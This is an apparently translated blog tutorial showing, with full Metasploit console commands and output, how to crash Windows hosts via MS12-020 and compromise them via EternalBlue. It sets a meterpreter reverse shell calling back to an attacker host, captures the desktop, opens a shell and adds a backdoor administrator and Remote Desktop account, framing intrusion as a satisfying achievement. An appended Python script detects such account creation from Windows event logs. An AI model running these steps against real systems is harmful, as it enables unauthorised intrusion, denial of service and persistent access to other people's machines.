
Metasploit (MSF): Quickly Using the MS12-020 and MS17-010 (EternalBlue) Vulnerabilities

2018-04-30 23:58  Author: 王忘杰-王土狗


Metasploit



What is Metasploit? Metasploit is a free, downloadable framework through which one can easily obtain, develop, and launch attacks against vulnerabilities in computer software. It is a professional-grade exploitation tool that ships with hundreds of known software vulnerabilities.

If that is hard to follow, put it another way: countless vulnerabilities are discovered every day. If each of us collected a few of them, pooled them together, and reworked them so they all operate the same way, that is what MSF does. MSF was originally intended as a development platform for attack tools, but nowadays it has largely become the arsenal of amateur security enthusiasts and security professionals alike: a few mouse clicks are enough for a successful intrusion.

MS12-020

MS12-020 is a vulnerability in the Remote Desktop Protocol (RDP). In the worst case it can lead to remote code execution; in the usual case it crashes the target with a blue screen.

How to use it

msfconsole: enter the MSF framework from the terminal

Search for the vulnerability module

msf > search 12_020 

[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   auxiliary/scanner/rdp/ms12_020_check                               normal  MS12-020 Microsoft Remote Desktop Checker

Select the module

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

View its options

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port (TCP)

The module is auxiliary/dos/windows/rdp/ms12_020_maxchannelids; its parameters are RHOST (the target address) and RPORT (the target port).

Set the parameters

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.136.129
RHOST => 192.168.136.129

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RPORT 3389
RPORT => 3389

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.136.129  yes       The target address
   RPORT  3389             yes       The target port (TCP)

Run

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit 

[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.136.129:3389 - 192.168.136.129:3389 - 210 bytes sent
[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Checking RDP status...
[+] 192.168.136.129:3389 - 192.168.136.129:3389 seems down
[*] Auxiliary module execution completed

Attack complete

The target blue-screens

MS12-020 is one of the simpler modules to use in MSF. It is a good way to learn the basic workflow of the framework while quickly getting the sense of achievement of a successful intrusion.

MS17-010 (EternalBlue)

EternalBlue was the culprit behind the ransomware that swept the globe in 2017 and is Microsoft's most serious remote code execution vulnerability of recent years: it yields system privileges directly. All IT practitioners should keep their systems fully patched at all times to prevent trouble later.

How to use it

Enter the MSF framework

root@kali:~# msfconsole

Search for MS17-010 modules

search 17_010 

[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Detect vulnerable hosts on the internal network

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24
RHOSTS => 192.168.136.129/24

msf auxiliary(scanner/smb/smb_ms17_010) > exploit

[*] Scanned  26 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[+] 192.168.136.129:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

Load the exploit module

msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 

msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Configure

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129
RHOST => 192.168.136.129

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131
LHOST => 192.168.136.131

msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.136.129  yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.136.131  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Launch the attack

msf exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.136.131:4444
[*] 192.168.136.129:445 - Connecting to target for exploitation.
[+] 192.168.136.129:445 - Connection established for exploitation.
[+] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.136.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.136.129:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 192.168.136.129:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 192.168.136.129:445 - 0x00000030  61 63 6b 20 31                                   ack 1
[+] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.136.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.136.129:445 - Starting non-paged pool grooming
[+] 192.168.136.129:445 - Sending SMBv2 buffers
[+] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.136.129:445 - Sending final SMBv2 buffers.
[*] 192.168.136.129:445 - Sending last fragment of exploit packet!
[*] 192.168.136.129:445 - Receiving response from exploit packet
[+] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.136.129:445 - Sending egg to corrupted connection.
[*] 192.168.136.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53 +0800
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Capture the target's desktop

meterpreter > screenshot

Screenshot saved to: /root/VrBAGsTE.jpeg



Obtain a shell

meterpreter > shell

Process 4088 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>

Add an administrator account and put it in the Remote Desktop Users group

net user test test123 /add

net localgroup administrators test /add

net localgroup "Remote Desktop Users" test /add


Intrusion complete.

MS17-010 is of moderate difficulty in MSF: it involves scanning, configuring the callback, capturing the desktop, privilege escalation and other techniques, which makes it an excellent subject for study.
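From the defender's side, the final step above (a new local account created and added to Administrators and Remote Desktop Users) leaves a distinctive trail in the Windows Security log. The following Python script is an added example, not part of the original post: it correlates account-creation (event 4720) and local-group-membership (event 4732) records and flags an account added to a sensitive group shortly after it was created. The event IDs are real Windows Security event IDs; the one-line record format, field names and sample records are constructed for this example and are simpler than the real event XML.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the original post). Each line is
# "timestamp | EventID | field=value;field=value". Field names are simplified;
# real Windows events use different element names (e.g. TargetUserName).
SAMPLE_EVENTS = """\
2018-04-30T23:31:53 | 4624 | Account=SYSTEM;LogonType=5
2018-04-30T23:33:02 | 4720 | Account=test;Actor=WIN-SRV$
2018-04-30T23:33:04 | 4732 | Member=test;Group=Administrators;Actor=WIN-SRV$
2018-04-30T23:33:05 | 4732 | Member=test;Group=Remote Desktop Users;Actor=WIN-SRV$
2018-04-30T20:10:00 | 4720 | Account=svc_backup;Actor=jsmith
2018-04-30T22:45:00 | 4732 | Member=svc_backup;Group=Backup Operators;Actor=jsmith
"""

# Groups whose membership grants admin rights or RDP access, as on this page.
SENSITIVE_GROUPS = {"Administrators", "Remote Desktop Users"}
WINDOW = timedelta(minutes=10)  # creation-to-group-add delay worth alerting on

def parse_events(text):
    """Parse the constructed one-line format into dicts sorted by timestamp."""
    events = []
    for line in text.splitlines():
        ts, event_id, fields = (part.strip() for part in line.split("|", 2))
        data = dict(kv.split("=", 1) for kv in fields.split(";"))
        data["ts"] = datetime.fromisoformat(ts)
        data["id"] = int(event_id)
        events.append(data)
    return sorted(events, key=lambda e: e["ts"])

def find_backdoor_accounts(text):
    """Alert on accounts created (4720) and then added to a sensitive
    local group (4732) within WINDOW."""
    events = parse_events(text)
    created = {e["Account"]: e for e in events if e["id"] == 4720}
    alerts = []
    for e in events:
        if e["id"] != 4732 or e.get("Group") not in SENSITIVE_GROUPS:
            continue
        c = created.get(e["Member"])
        if c is None or not (timedelta(0) <= e["ts"] - c["ts"] <= WINDOW):
            continue
        alerts.append({
            "account": e["Member"],
            "group": e["Group"],
            "actor": e["Actor"],
            # A computer account ($) as actor means the change ran in SYSTEM
            # context rather than from an administrator's interactive session.
            "system_context": e["Actor"].endswith("$"),
        })
    return alerts

if __name__ == "__main__":
    for alert in find_backdoor_accounts(SAMPLE_EVENTS):
        print(alert)
```

The svc_backup account in the sample is left alone because Backup Operators is not in the sensitive set and the group add happens hours after creation.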

